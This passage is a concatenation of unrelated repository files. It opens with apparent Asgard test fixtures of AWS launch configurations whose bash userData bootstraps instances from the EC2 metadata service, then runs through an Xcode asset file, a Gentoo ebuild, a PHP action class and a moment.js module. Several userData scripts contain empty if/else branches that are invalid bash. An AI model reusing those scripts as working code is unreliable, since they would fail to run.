$url`\ndo\necho $uri | grep -q -E '=' && continue\necho $uri | grep -q -E 'public' && continue\nif echo $uri | grep -q -E '/$'\nthen\nmetadatavars \"${url}${uri}\"\nelse\nprintf \"export EC2_%s=\\\"%s\\\"\\n\" `echo $uri | tr '/-' '_' | tr 'a-z' 'A-Z'` \"`$curl ${url}${uri}| tr '\\n' ' '`\"\nfi\ndone\n}\n\nmetadatavars http://169.254.169.254/latest/meta-data/ >> /etc/profile.d/netflix_environment.sh\n. /etc/profile.d/netflix_environment.sh\n\nln -s $jmxf $jmxl\n\nif newbase\nthen\n/usr/local/bin/installcrontab $appuser\nelse\nfi\n\nif ! grep -q '/etc/alternatives/java_sdk/lib/tools.jar' /apps/tomcat/bin/setclasspath.sh\nthen\nfi\n\n# udf1 end\n\nserver_template_crl=/apps/tomcat/conf/server_template_2011.xml \n\n# end added for CRL support\n\ntouch /tmp/udf-complete\n# udf2 end\n\n"
},
{
"blockDeviceMappings":
[
],
"class": "com.amazonaws.services.autoscaling.model.LaunchConfiguration",
"createdTime": "2011-10-14T21:16:58Z",
"imageId": "ami-c13cf0a8",
"instanceMonitoring": {
"class": "com.amazonaws.services.autoscaling.model.InstanceMonitoring",
"enabled": true
},
"instanceType": "m1.large",
"kernelId": "",
"keyName": "nf-test-keypair-a",
"launchConfigurationARN": "arn:aws:autoscaling:us-east-1:179000000000:launchConfiguration:2b2f257c-51f5-4b56-a032-c042edcd52ec:launchConfigurationName/akms-v002-20111014141657",
"launchConfigurationName": "akms-v002-20111014141657",
"ramdiskId": "",
"securityGroups":
[
"akms",
"nf-datacenter",
"nf-infrastructure"
],
"userData": "#!/bin/bash\n# udf0 begin\nexec 1>/var/ec2/userdata.log\nexec 2>&1\nset -x\n\nPATH=/bin:/usr/bin:/usr/sbin:/sbin\n\napp=\"akms\"\nappenv=\"test\"\nregion=\"us-east-1\"\nappuser=\"${app}${appenv}\"\nstack=\"\"\ncluster=\"akms\"\nautogrp=\"akms-v002\"\nlaunchconfig=\"akms-v002-20111014141657\"\nclusterorapp=${cluster:-$app}\nnflxbase=`rpm -q nflx-base | sed 's:nflx-base-1..-\\(.*\\)$:\\1:'`\nappdynappname=\"$region $appenv\"\n\nsetenv_sh=\"/apps/tomcat/bin/setenv.sh\"\nNFenv=\"/apps/tomcat/bin/netflix.env\"\nserver_template_xml=\"/apps/tomcat/conf/server_template.xml\"\nserver_xml=\"/apps/tomcat/conf/server.xml\"\ninstanceid=`/usr/bin/instance-id`\n\n# udf0 end\n# udf-test begin\n\n# udf-test end\n# udf1 begin\nhostnamestring=${clusterorapp}-${instanceid}\nhostname $hostnamestring\nprintf \"/^HOSTNAME/ d\\n $\\na\\nHOSTNAME=${hostnamestring}\\n.\\nw\\nq\\n\" | ed -s /etc/sysconfig/network\necho \"127.0.0.1 localhost\" > /etc/hosts\nprintf \"%s\\t%s %s.netflix.com %s\\n\" `local-ipv4` `hostname` `hostname` `public-hostname` >> /etc/hosts\ntest -n \"$reg_hosts\" && echo $reg_hosts >> /etc/hosts\n\ncurl=\"curl --retry 3 --silent --show-error --fail\"\nmetadatavars() {\nlocal url=$1\nfor uri in `$curl $url`\ndo\necho $uri | grep -q -E '=' && continue\necho $uri | grep -q -E 'public' && continue\nif echo $uri | grep -q -E '/$'\nthen\nmetadatavars \"${url}${uri}\"\nelse\nprintf \"export EC2_%s=\\\"%s\\\"\\n\" `echo $uri | tr '/-' '_' | tr 'a-z' 'A-Z'` \"`$curl ${url}${uri}| tr '\\n' ' '`\"\nfi\ndone\n}\n\nmetadatavars http://169.254.169.254/latest/meta-data/ >> /etc/profile.d/netflix_environment.sh\n. /etc/profile.d/netflix_environment.sh\n\nln -s $jmxf $jmxl\n\nif newbase\nthen\n/usr/local/bin/installcrontab $appuser\nelse\nfi\n\nif ! grep -q '/etc/alternatives/java_sdk/lib/tools.jar' /apps/tomcat/bin/setclasspath.sh\nthen\nfi\n\n# udf1 end\n\nserver_template_crl=/apps/tomcat/conf/server_template_2011.xml \n\n# end added for CRL support\n\ntouch /tmp/udf-complete\n# udf2 end\n\n"
},
{
"blockDeviceMappings":
[
],
"class": "com.amazonaws.services.autoscaling.model.LaunchConfiguration",
"createdTime": "2011-10-14T21:34:48Z",
"imageId": "ami-c13cf0a8",
"instanceMonitoring": {
"class": "com.amazonaws.services.autoscaling.model.InstanceMonitoring",
"enabled": true
},
"instanceType": "m1.large",
"kernelId": "",
"keyName": "nf-test-keypair-a",
"launchConfigurationARN": "arn:aws:autoscaling:us-east-1:179000000000:launchConfiguration:cbd20835-1882-4ebb-8265-8ca861a524ed:launchConfigurationName/akms-v002-20111014143448",
"launchConfigurationName": "akms-v002-20111014143448",
"ramdiskId": "",
"securityGroups":
[
"akms",
"nf-datacenter",
"nf-infrastructure"
],
"userData": "#!/bin/bash\n# udf0 begin\nexec 1>/var/ec2/userdata.log\nexec 2>&1\nset -x\n\nPATH=/bin:/usr/bin:/usr/sbin:/sbin\n\napp=\"akms\"\nappenv=\"test\"\nregion=\"us-east-1\"\nappuser=\"${app}${appenv}\"\nstack=\"\"\ncluster=\"akms\"\nautogrp=\"akms-v002\"\nlaunchconfig=\"akms-v002-20111014143448\"\nclusterorapp=${cluster:-$app}\nnflxbase=`rpm -q nflx-base | sed 's:nflx-base-1..-\\(.*\\)$:\\1:'`\nappdynappname=\"$region $appenv\"\n\nsetenv_sh=\"/apps/tomcat/bin/setenv.sh\"\nNFenv=\"/apps/tomcat/bin/netflix.env\"\nserver_template_xml=\"/apps/tomcat/conf/server_template.xml\"\nserver_xml=\"/apps/tomcat/conf/server.xml\"\ninstanceid=`/usr/bin/instance-id`\n\n# udf0 end\n# udf-test begin\n\n# udf-test end\n# udf1 begin\nhostnamestring=${clusterorapp}-${instanceid}\nhostname $hostnamestring\nprintf \"/^HOSTNAME/ d\\n $\\na\\nHOSTNAME=${hostnamestring}\\n.\\nw\\nq\\n\" | ed -s /etc/sysconfig/network\necho \"127.0.0.1 localhost\" > /etc/hosts\nprintf \"%s\\t%s %s.netflix.com %s\\n\" `local-ipv4` `hostname` `hostname` `public-hostname` >> /etc/hosts\ntest -n \"$reg_hosts\" && echo $reg_hosts >> /etc/hosts\n\ncurl=\"curl --retry 3 --silent --show-error --fail\"\nmetadatavars() {\nlocal url=$1\nfor uri in `$curl $url`\ndo\necho $uri | grep -q -E '=' && continue\necho $uri | grep -q -E 'public' && continue\nif echo $uri | grep -q -E '/$'\nthen\nmetadatavars \"${url}${uri}\"\nelse\nprintf \"export EC2_%s=\\\"%s\\\"\\n\" `echo $uri | tr '/-' '_' | tr 'a-z' 'A-Z'` \"`$curl ${url}${uri}| tr '\\n' ' '`\"\nfi\ndone\n}\n\nmetadatavars http://169.254.169.254/latest/meta-data/ >> /etc/profile.d/netflix_environment.sh\n. /etc/profile.d/netflix_environment.sh\n\nln -s $jmxf $jmxl\n\nif newbase\nthen\n/usr/local/bin/installcrontab $appuser\nelse\nfi\n\nif ! grep -q '/etc/alternatives/java_sdk/lib/tools.jar' /apps/tomcat/bin/setclasspath.sh\nthen\nfi\n\n# udf1 end\n\nserver_template_crl=/apps/tomcat/conf/server_template_2011.xml \n\n# end added for CRL support\n\ntouch /tmp/udf-complete\n# udf2 end\n\n"
},
{
"blockDeviceMappings":
[
],
"class": "com.amazonaws.services.autoscaling.model.LaunchConfiguration",
"createdTime": "2011-10-15T00:47:25Z",
"imageId": "ami-fd5f9394",
"instanceMonitoring": {
"class": "com.amazonaws.services.autoscaling.model.InstanceMonitoring",
"enabled": true
},
"instanceType": "m1.large",
"kernelId": "",
"keyName": "nf-test-keypair-a",
"launchConfigurationARN": "arn:aws:autoscaling:us-east-1:179000000000:launchConfiguration:9ae2c31f-c8cd-4ced-b5d9-f3d9e0355f6b:launchConfigurationName/akms-v002-20111014174724",
"launchConfigurationName": "akms-v002-20111014174724",
"ramdiskId": "",
"securityGroups":
[
"akms",
"nf-datacenter",
"nf-infrastructure"
],
"userData": "#!/bin/bash\n# udf0 begin\nexec 1>/var/ec2/userdata.log\nexec 2>&1\nset -x\n\nPATH=/bin:/usr/bin:/usr/sbin:/sbin\n\napp=\"akms\"\nappenv=\"test\"\nregion=\"us-east-1\"\nappuser=\"${app}${appenv}\"\nstack=\"\"\ncluster=\"akms\"\nautogrp=\"akms-v002\"\nlaunchconfig=\"akms-v002-20111014174724\"\nclusterorapp=${cluster:-$app}\nnflxbase=`rpm -q nflx-base | sed 's:nflx-base-1..-\\(.*\\)$:\\1:'`\nappdynappname=\"$region $appenv\"\n\nsetenv_sh=\"/apps/tomcat/bin/setenv.sh\"\nNFenv=\"/apps/tomcat/bin/netflix.env\"\nserver_template_xml=\"/apps/tomcat/conf/server_template.xml\"\nserver_xml=\"/apps/tomcat/conf/server.xml\"\ninstanceid=`/usr/bin/instance-id`\n\n# udf0 end\n# udf-test begin\n\n# udf-test end\n# udf1 begin\nhostnamestring=${clusterorapp}-${instanceid}\nhostname $hostnamestring\nprintf \"/^HOSTNAME/ d\\n $\\na\\nHOSTNAME=${hostnamestring}\\n.\\nw\\nq\\n\" | ed -s /etc/sysconfig/network\necho \"127.0.0.1 localhost\" > /etc/hosts\nprintf \"%s\\t%s %s.netflix.com %s\\n\" `local-ipv4` `hostname` `hostname` `public-hostname` >> /etc/hosts\ntest -n \"$reg_hosts\" && echo $reg_hosts >> /etc/hosts\n\ncurl=\"curl --retry 3 --silent --show-error --fail\"\nmetadatavars() {\nlocal url=$1\nfor uri in `$curl $url`\ndo\necho $uri | grep -q -E '=' && continue\necho $uri | grep -q -E 'public' && continue\nif echo $uri | grep -q -E '/$'\nthen\nmetadatavars \"${url}${uri}\"\nelse\nprintf \"export EC2_%s=\\\"%s\\\"\\n\" `echo $uri | tr '/-' '_' | tr 'a-z' 'A-Z'` \"`$curl ${url}${uri}| tr '\\n' ' '`\"\nfi\ndone\n}\n\nmetadatavars http://169.254.169.254/latest/meta-data/ >> /etc/profile.d/netflix_environment.sh\n. /etc/profile.d/netflix_environment.sh\n\nln -s $jmxf $jmxl\n\nif newbase\nthen\n/usr/local/bin/installcrontab $appuser\nelse\nfi\n\nif ! grep -q '/etc/alternatives/java_sdk/lib/tools.jar' /apps/tomcat/bin/setclasspath.sh\nthen\nfi\n\n# udf1 end\n\nserver_template_crl=/apps/tomcat/conf/server_template_2011.xml \n\n# end added for CRL support\n\ntouch /tmp/udf-complete\n# udf2 end\n\n"
},
{
"blockDeviceMappings":
[
],
"class": "com.amazonaws.services.autoscaling.model.LaunchConfiguration",
"createdTime": "2011-10-18T18:24:15Z",
"imageId": "ami-e3ab648a",
"instanceMonitoring": {
"class": "com.amazonaws.services.autoscaling.model.InstanceMonitoring",
"enabled": true
},
"instanceType": "m1.large",
"kernelId": "",
"keyName": "nf-test-keypair-a",
"launchConfigurationARN": "arn:aws:autoscaling:us-east-1:179000000000:launchConfiguration:bb6dba0c-e56f-4084-9953-006b46c7cf71:launchConfigurationName/akms-v002-20111018112415",
"launchConfigurationName": "akms-v002-20111018112415",
"ramdiskId": "",
"securityGroups":
[
"akms",
"nf-datacenter",
"nf-infrastructure"
],
"userData": "#!/bin/bash\n# udf0 begin\nexec 1>/var/ec2/userdata.log\nexec 2>&1\nset -x\n\nPATH=/bin:/usr/bin:/usr/sbin:/sbin\n\napp=\"akms\"\nappenv=\"test\"\nregion=\"us-east-1\"\nappuser=\"${app}${appenv}\"\nstack=\"\"\ncluster=\"akms\"\nautogrp=\"akms-v002\"\nlaunchconfig=\"akms-v002-20111018112415\"\nclusterorapp=${cluster:-$app}\nnflxbase=`rpm -q nflx-base | sed 's:nflx-base-1..-\\(.*\\)$:\\1:'`\nappdynappname=\"$region $appenv\"\n\nsetenv_sh=\"/apps/tomcat/bin/setenv.sh\"\nNFenv=\"/apps/tomcat/bin/netflix.env\"\nserver_template_xml=\"/apps/tomcat/conf/server_template.xml\"\nserver_xml=\"/apps/tomcat/conf/server.xml\"\ninstanceid=`/usr/bin/instance-id`\n\n# udf0 end\n# udf-test begin\n\n# udf-test end\n# udf1 begin\nhostnamestring=${clusterorapp}-${instanceid}\nhostname $hostnamestring\nprintf \"/^HOSTNAME/ d\\n $\\na\\nHOSTNAME=${hostnamestring}\\n.\\nw\\nq\\n\" | ed -s /etc/sysconfig/network\necho \"127.0.0.1 localhost\" > /etc/hosts\nprintf \"%s\\t%s %s.netflix.com %s\\n\" `local-ipv4` `hostname` `hostname` `public-hostname` >> /etc/hosts\ntest -n \"$reg_hosts\" && echo $reg_hosts >> /etc/hosts\n\ncurl=\"curl --retry 3 --silent --show-error --fail\"\nmetadatavars() {\nlocal url=$1\nfor uri in `$curl $url`\ndo\necho $uri | grep -q -E '=' && continue\necho $uri | grep -q -E 'public' && continue\nif echo $uri | grep -q -E '/$'\nthen\nmetadatavars \"${url}${uri}\"\nelse\nprintf \"export EC2_%s=\\\"%s\\\"\\n\" `echo $uri | tr '/-' '_' | tr 'a-z' 'A-Z'` \"`$curl ${url}${uri}| tr '\\n' ' '`\"\nfi\ndone\n}\n\nmetadatavars http://169.254.169.254/latest/meta-data/ >> /etc/profile.d/netflix_environment.sh\n. /etc/profile.d/netflix_environment.sh\n\nln -s $jmxf $jmxl\n\nif newbase\nthen\n/usr/local/bin/installcrontab $appuser\nelse\nfi\n\nif ! grep -q '/etc/alternatives/java_sdk/lib/tools.jar' /apps/tomcat/bin/setclasspath.sh\nthen\nfi\n\n# udf1 end\n\nserver_template_crl=/apps/tomcat/conf/server_template_2011.xml \n\n# end added for CRL support\n\ntouch /tmp/udf-complete\n# udf2 end\n\n"
},
{
"blockDeviceMappings":
[
],
"class": "com.amazonaws.services.autoscaling.model.LaunchConfiguration",
"createdTime": "2011-10-18T21:10:10Z",
"imageId": "ami-fd5f9394",
"instanceMonitoring": {
"class": "com.amazonaws.services.autoscaling.model.InstanceMonitoring",
"enabled": true
},
"instanceType": "m1.large",
"kernelId": "",
"keyName": "nf-test-keypair-a",
"launchConfigurationARN": "arn:aws:autoscaling:us-east-1:179000000000:launchConfiguration:53be19fa-d544-40d1-a00d-cacb6ce29fa3:launchConfigurationName/akms-v002-20111018141009",
"launchConfigurationName": "akms-v002-20111018141009",
"ramdiskId": "",
"securityGroups":
[
"akms",
"nf-datacenter",
"nf-infrastructure"
],
"userData": "#!/bin/bash\n# udf0 begin\nexec 1>/var/ec2/userdata.log\nexec 2>&1\nset -x\n\nPATH=/bin:/usr/bin:/usr/sbin:/sbin\n\napp=\"akms\"\nappenv=\"test\"\nregion=\"us-east-1\"\nappuser=\"${app}${appenv}\"\nstack=\"\"\ncluster=\"akms\"\nautogrp=\"akms-v002\"\nlaunchconfig=\"akms-v002-20111018141009\"\nclusterorapp=${cluster:-$app}\nnflxbase=`rpm -q nflx-base | sed 's:nflx-base-1..-\\(.*\\)$:\\1:'`\nappdynappname=\"$region $appenv\"\n\nsetenv_sh=\"/apps/tomcat/bin/setenv.sh\"\nNFenv=\"/apps/tomcat/bin/netflix.env\"\nserver_template_xml=\"/apps/tomcat/conf/server_template.xml\"\nserver_xml=\"/apps/tomcat/conf/server.xml\"\ninstanceid=`/usr/bin/instance-id`\n\n# udf0 end\n# udf-test begin\n\n# udf-test end\n# udf1 begin\nhostnamestring=${clusterorapp}-${instanceid}\nhostname $hostnamestring\nprintf \"/^HOSTNAME/ d\\n $\\na\\nHOSTNAME=${hostnamestring}\\n.\\nw\\nq\\n\" | ed -s /etc/sysconfig/network\necho \"127.0.0.1 localhost\" > /etc/hosts\nprintf \"%s\\t%s %s.netflix.com %s\\n\" `local-ipv4` `hostname` `hostname` `public-hostname` >> /etc/hosts\ntest -n \"$reg_hosts\" && echo $reg_hosts >> /etc/hosts\n\ncurl=\"curl --retry 3 --silent --show-error --fail\"\nmetadatavars() {\nlocal url=$1\nfor uri in `$curl $url`\ndo\necho $uri | grep -q -E '=' && continue\necho $uri | grep -q -E 'public' && continue\nif echo $uri | grep -q -E '/$'\nthen\nmetadatavars \"${url}${uri}\"\nelse\nprintf \"export EC2_%s=\\\"%s\\\"\\n\" `echo $uri | tr '/-' '_' | tr 'a-z' 'A-Z'` \"`$curl ${url}${uri}| tr '\\n' ' '`\"\nfi\ndone\n}\n\nmetadatavars http://169.254.169.254/latest/meta-data/ >> /etc/profile.d/netflix_environment.sh\n. /etc/profile.d/netflix_environment.sh\n\nln -s $jmxf $jmxl\n\nif newbase\nthen\n/usr/local/bin/installcrontab $appuser\nelse\nfi\n\nif ! grep -q '/etc/alternatives/java_sdk/lib/tools.jar' /apps/tomcat/bin/setclasspath.sh\nthen\nfi\n\n# udf1 end\n\nserver_template_crl=/apps/tomcat/conf/server_template_2011.xml \n\n# end added for CRL support\n\ntouch /tmp/udf-complete\n# udf2 end\n\n"
},
{
"blockDeviceMappings":
[
],
"class": "com.amazonaws.services.autoscaling.model.LaunchConfiguration",
"createdTime": "2011-10-14T23:52:41Z",
"imageId": "ami-4775b32e",
"instanceMonitoring": {
"class": "com.amazonaws.services.autoscaling.model.InstanceMonitoring",
"enabled": true
},
"instanceType": "m1.large",
"kernelId": "",
"keyName": "nf-test-keypair-a",
"launchConfigurationARN": "arn:aws:autoscaling:us-east-1:179000000000:launchConfiguration:c774340b-32c0-49b3-b37e-c551c296a2c2:launchConfigurationName/helloworld-example-v015-20111014165240",
"launchConfigurationName": "helloworld-example-v015-20111014165240",
"ramdiskId": "",
"securityGroups":
[
"helloworld",
"helloworld-frontend",
"helloworld-asgardtest",
"nf-datacenter",
"nf-infrastructure"
],
"userData": "#!/bin/bash\n# udf0 begin\nexec 1>/var/ec2/userdata.log\nexec 2>&1\nset -x\n\nPATH=/bin:/usr/bin:/usr/sbin:/sbin\n\napp=\"helloworld\"\nappenv=\"test\"\nregion=\"us-east-1\"\nappuser=\"${app}${appenv}\"\nstack=\"example\"\ncluster=\"helloworld-example\"\nautogrp=\"helloworld-example-v015\"\nlaunchconfig=\"helloworld-example-v015-20111014165240\"\nclusterorapp=${cluster:-$app}\nnflxbase=`rpm -q nflx-base | sed 's:nflx-base-1..-\\(.*\\)$:\\1:'`\nappdynappname=\"$region $appenv\"\n\nsetenv_sh=\"/apps/tomcat/bin/setenv.sh\"\nNFenv=\"/apps/tomcat/bin/netflix.env\"\nserver_template_xml=\"/apps/tomcat/conf/server_template.xml\"\nserver_xml=\"/apps/tomcat/conf/server.xml\"\ninstanceid=`/usr/bin/instance-id`\n\n# udf0 end\n# udf-test begin\n\n# udf-test end\n# udf1 begin\nhostnamestring=${clusterorapp}-${instanceid}\nhostname $hostnamestring\nprintf \"/^HOSTNAME/ d\\n $\\na\\nHOSTNAME=${hostnamestring}\\n.\\nw\\nq\\n\" | ed -s /etc/sysconfig/network\necho \"127.0.0.1 localhost\" > /etc/hosts\nprintf \"%s\\t%s %s.netflix.com %s\\n\" `local-ipv4` `hostname` `hostname` `public-hostname` >> /etc/hosts\ntest -n \"$reg_hosts\" && echo $reg_hosts >> /etc/hosts\n\ncurl=\"curl --retry 3 --silent --show-error --fail\"\nmetadatavars() {\nlocal url=$1\nfor uri in `$curl $url`\ndo\necho $uri | grep -q -E '=' && continue\necho $uri | grep -q -E 'public' && continue\nif echo $uri | grep -q -E '/$'\nthen\nmetadatavars \"${url}${uri}\"\nelse\nprintf \"export EC2_%s=\\\"%s\\\"\\n\" `echo $uri | tr '/-' '_' | tr 'a-z' 'A-Z'` \"`$curl ${url}${uri}| tr '\\n' ' '`\"\nfi\ndone\n}\n\nmetadatavars http://169.254.169.254/latest/meta-data/ >> /etc/profile.d/netflix_environment.sh\n. /etc/profile.d/netflix_environment.sh\n\nln -s $jmxf $jmxl\n\nif newbase\nthen\n/usr/local/bin/installcrontab $appuser\nelse\nfi\n\nif ! grep -q '/etc/alternatives/java_sdk/lib/tools.jar' /apps/tomcat/bin/setclasspath.sh\nthen\nfi\n\n# udf1 end\n# helloworld-example-test\n# asgardtest push adds this text to user data in all ASGs that are part of the helloworld-example cluster,\n# including ASGs helloworld-example and helloworld-example-v001 and helloworld-example-v002\n# Combined custom UDFs for an instance must stay below 9000 characters.\n\n# Environment variable can be read in Java code on the instance like this:\n# String flavor = System.getenv(\"FAVORITE_GELATO_FLAVOR\")\ncat <<EndOfInput>> /etc/profile.d/netflix_environment.sh\nexport FAVORITE_GELATO_FLAVOR=\"Coconut Pistachio\"\nexport FAVORITE_MUSICAL_INSTRUMENT=\"Acoustic Guitar\"\nEndOfInput\n\n# helloworld-test for us-east-1\n# asgardtest push adds this text to user data for all helloworld instances in us-east-1.\n# Combined custom UDFs for an instance must stay below 9000 characters.\n\n# Use Java to read environment variables set here.\n# String pizzaToppings = System.getenv(\"FAVORITE_PIZZA_TOPPINGS\")\ncat <<EndOfInput>> /etc/profile.d/netflix_environment.sh\nexport FAVORITE_PIZZA_TOPPINGS=\"Artichokes and Olives\"\nexport FAVORITE_BEVERAGE=\"Sherry\"\nEndOfInput\n\n# helloworld-example-test for us-east-1\n# asgardtest push adds this text to user data in all ASGs that are part of the helloworld-example cluster in us-east-1,\n# including ASGs helloworld-example and helloworld-example-v001 and helloworld-example-v002\n# Combined custom UDFs for an instance must stay below 9000 characters.\n\n# Environment variable can be read in Java code on the instance like this:\n# String flavor = System.getenv(\"FAVORITE_GELATO_FLAVOR\")\ncat <<EndOfInput>> /etc/profile.d/netflix_environment.sh\nexport FAVORITE_GELATO_FLAVOR=\"Campfire Banana\"\nexport FAVORITE_MUSICAL_INSTRUMENT=\"Irish Flute\"\nEndOfInput\n\n# udf2 begin\nchown -R ${appuser}:asgard /apps\ntouch /tmp/udf-complete\n# udf2 end\n\n"
},
{
"blockDeviceMappings":
[
],
"class": "com.amazonaws.services.autoscaling.model.LaunchConfiguration",
"createdTime": "2011-07-21T17:10:40Z",
"imageId": "ami-dfdd1ab6",
"instanceMonitoring": {
"class": "com.amazonaws.services.autoscaling.model.InstanceMonitoring",
"enabled": true
},
"instanceType": "m1.large",
"kernelId": "",
"keyName": "nf-test-keypair-a",
"launchConfigurationARN": "arn:aws:autoscaling:us-east-1:179000000000:launchConfiguration:b647eb22-906f-4b91-833a-c7c714cf6f3b:launchConfigurationName/ntsuiboot-v000-20110721101039",
"launchConfigurationName": "ntsuiboot-v000-20110721101039",
"ramdiskId": "",
"securityGroups":
[
"nf-datacenter",
"nf-infrastructure",
"ntsuiboot"
],
"userData": "#!/bin/bash\n# udf0 begin\nexec 1>/var/ec2/userdata.log\nexec 2>&1\nset -x\n\nPATH=/bin:/usr/bin:/usr/sbin:/sbin\n\napp=\"ntsuiboot\"\nappenv=\"test\"\nregion=\"us-east-1\"\nappuser=\"${app}${appenv}\"\nstack=\"\"\ncluster=\"ntsuiboot\"\nautogrp=\"ntsuiboot-v000\"\nlaunchconfig=\"ntsuiboot-v000-20110721101039\"\nclusterorapp=${cluster:-$app}\nnflxbase=`rpm -q nflx-base | sed 's:nflx-base-1..-\\(.*\\)$:\\1:'`\n\nsetenv_sh=\"/apps/tomcat/bin/setenv.sh\"\nNFenv=\"/apps/tomcat/bin/netflix.env\"\nserver_template_xml=\"/apps/tomcat/conf/server_template.xml\"\nserver_xml=\"/apps/tomcat/conf/server.xml\"\ninstanceid=`/usr/bin/instance-id`\n\n# udf0 end\n# udf-test begin\nappdynappname=\"Cloud Milestones - test AWS\"\n\ntouch /tmp/udf-complete\n# udf2 end\n\n"
},
{
"blockDeviceMappings":
[
],
"class": "com.amazonaws.services.autoscaling.model.LaunchConfiguration",
"createdTime": "2011-10-18T19:45:26Z",
"imageId": "ami-fba96692",
"instanceMonitoring": {
"class": "com.amazonaws.services.autoscaling.model.InstanceMonitoring",
"enabled": true
},
"instanceType": "m1.large",
"kernelId": "",
"keyName": "nf-test-keypair-a",
"launchConfigurationARN": "arn:aws:autoscaling:us-east-1:179000000000:launchConfiguration:e5e439c9-627e-45db-ba8d-ad920fc84823:launchConfigurationName/ntsuiboot-v001-20111018124526",
"launchConfigurationName": "ntsuiboot-v001-20111018124526",
"ramdiskId": "",
"securityGroups":
[
"nf-datacenter",
"nf-infrastructure",
"ntsuiboot"
],
"userData": "#!/bin/bash\n# udf0 begin\nexec 1>/var/ec2/userdata.log\nexec 2>&1\nset -x\n\nPATH=/bin:/usr/bin:/usr/sbin:/sbin\n\napp=\"ntsuiboot\"\nappenv=\"test\"\nregion=\"us-east-1\"\nappuser=\"${app}${appenv}\"\nstack=\"\"\ncluster=\"ntsuiboot\"\nautogrp=\"ntsuiboot-v001\"\nlaunchconfig=\"ntsuiboot-v001-20111018124526\"\nclusterorapp=${cluster:-$app}\nnflxbase=`rpm -q nflx-base | sed 's:nflx-base-1..-\\(.*\\)$:\\1:'`\nappdynappname=\"$region $appenv\"\n\nsetenv_sh=\"/apps/tomcat/bin/setenv.sh\"\nNFenv=\"/apps/tomcat/bin/netflix.env\"\nserver_template_xml=\"/apps/tomcat/conf/server_template.xml\"\nserver_xml=\"/apps/tomcat/conf/server.xml\"\ninstanceid=`/usr/bin/instance-id`\n\n# udf0 end\n# udf-test begin\n\n# udf-test end\n# udf1 begin\nhostnamestring=${clusterorapp}-${instanceid}\nhostname $hostnamestring\nprintf \"/^HOSTNAME/ d\\n $\\na\\nHOSTNAME=${hostnamestring}\\n.\\nw\\nq\\n\" | ed -s /etc/sysconfig/network\necho \"127.0.0.1 localhost\" > /etc/hosts\nprintf \"%s\\t%s %s.netflix.com %s\\n\" `local-ipv4` `hostname` `hostname` `public-hostname` >> /etc/hosts\ntest -n \"$reg_hosts\" && echo $reg_hosts >> /etc/hosts\n\ncurl=\"curl --retry 3 --silent --show-error --fail\"\nmetadatavars() {\nlocal url=$1\nfor uri in `$curl $url`\ndo\necho $uri | grep -q -E '=' && continue\necho $uri | grep -q -E 'public' && continue\nif echo $uri | grep -q -E '/$'\nthen\nmetadatavars \"${url}${uri}\"\nelse\nprintf \"export EC2_%s=\\\"%s\\\"\\n\" `echo $uri | tr '/-' '_' | tr 'a-z' 'A-Z'` \"`$curl ${url}${uri}| tr '\\n' ' '`\"\nfi\ndone\n}\n\nmetadatavars http://169.254.169.254/latest/meta-data/ >> /etc/profile.d/netflix_environment.sh\n. /etc/profile.d/netflix_environment.sh\n\nln -s $jmxf $jmxl\n\nif newbase\nthen\n/usr/local/bin/installcrontab $appuser\nelse\nfi\n\nif ! grep -q '/etc/alternatives/java_sdk/lib/tools.jar' /apps/tomcat/bin/setclasspath.sh\nthen\nfi\n\n# udf1 end\n# udf2 begin\nchown -R ${appuser}:asgard /apps\ntouch /tmp/udf-complete\n# udf2 end\n\n"
}
]
| {
"pile_set_name": "Github"
} |
{
"images" : [
{
"idiom" : "universal",
"scale" : "1x"
},
{
"idiom" : "universal",
"filename" : "[email protected]",
"scale" : "2x"
},
{
"idiom" : "universal",
"filename" : "[email protected]",
"scale" : "3x"
}
],
"info" : {
"version" : 1,
"author" : "xcode"
}
} | {
"pile_set_name": "Github"
} |
# Copyright 1999-2020 Gentoo Authors
# Distributed under the terms of the GNU General Public License v2
EAPI=7
# ebuild generated by hackport 0.6.1.9999
CABAL_FEATURES="lib profile haddock hoogle hscolour test-suite"
inherit haskell-cabal
DESCRIPTION="Generic programming library for generalised deriving"
HOMEPAGE="https://github.com/dreixel/generic-deriving"
SRC_URI="https://hackage.haskell.org/package/${P}/${P}.tar.gz"
LICENSE="BSD"
SLOT="0/${PV}"
KEYWORDS="~amd64 ~x86"
IUSE=""
RDEPEND=">=dev-haskell/th-abstraction-0.3:=[profile?] <dev-haskell/th-abstraction-0.4:=[profile?]
>=dev-lang/ghc-7.4.1:=
"
DEPEND="${RDEPEND}
>=dev-haskell/cabal-1.10
test? ( >=dev-haskell/hspec-2 <dev-haskell/hspec-3 )
"
| {
"pile_set_name": "Github"
} |
<?php
namespace Oro\Component\Action\Action;
use Oro\Component\Action\Exception\InvalidParameterException;
use Symfony\Component\PropertyAccess\PropertyPathInterface;
/**
* Increase or decrease the integer value by some value
*
* Usage:
* @increase_value:
* attribute: $.some_value
* value: 5
*
* OR
*
* @increase_value:
* attribute: $.some_value
* value: -5
*
* OR
*
* @increase_value: [$.some_value, 5]
*
* OR
*
* @increase_value: $.some_value
*/
class IncreaseValue extends AbstractAction
{
/**
* @var array
*/
protected $options = [];
/**
* {@inheritdoc}
*/
public function initialize(array $options)
{
$count = count($options);
if ($count < 1) {
throw new InvalidParameterException('Attribute parameter is required.');
}
if (!isset($options['attribute']) && !isset($options[0])) {
throw new InvalidParameterException('Attribute must be defined.');
}
if (!($this->getAttribute($options) instanceof PropertyPathInterface)) {
throw new InvalidParameterException('Attribute must be valid property definition.');
}
$value = $this->getValue($options);
if (!is_int($value)) {
throw new InvalidParameterException('Value must be integer.');
}
$this->options = $options;
return $this;
}
/**
* @param array $options
*
* @return mixed
*/
protected function getAttribute(array $options)
{
return array_key_exists('attribute', $options) ? $options['attribute'] : $options[0];
}
/**
* @param array $options
*
* @return mixed
*/
protected function getValue(array $options)
{
$value = 1;
if (isset($options['value'])) {
$value = $options['value'];
} elseif (isset($options[1])) {
$value = $options[1];
}
return $value;
}
/**
* {@inheritdoc}
*/
protected function executeAction($context)
{
$attribute = $this->getAttribute($this->options);
$value = $this->getValue($this->options);
$result = (int)$this->contextAccessor->getValue($context, $attribute);
$result += (int)$this->contextAccessor->getValue($context, $value);
$this->contextAccessor->setValue($context, $attribute, $result);
}
}
| {
"pile_set_name": "Github"
} |
import { normalizeObjectUnits } from '../units/aliases';
import { configFromArray } from './from-array';
import map from '../utils/map';
export function configFromObject(config) {
if (config._d) {
return;
}
var i = normalizeObjectUnits(config._i);
config._a = map([i.year, i.month, i.day || i.date, i.hour, i.minute, i.second, i.millisecond], function (obj) {
return obj && parseInt(obj, 10);
});
configFromArray(config);
}
| {
"pile_set_name": "Github"
} |
/*=============================================================================
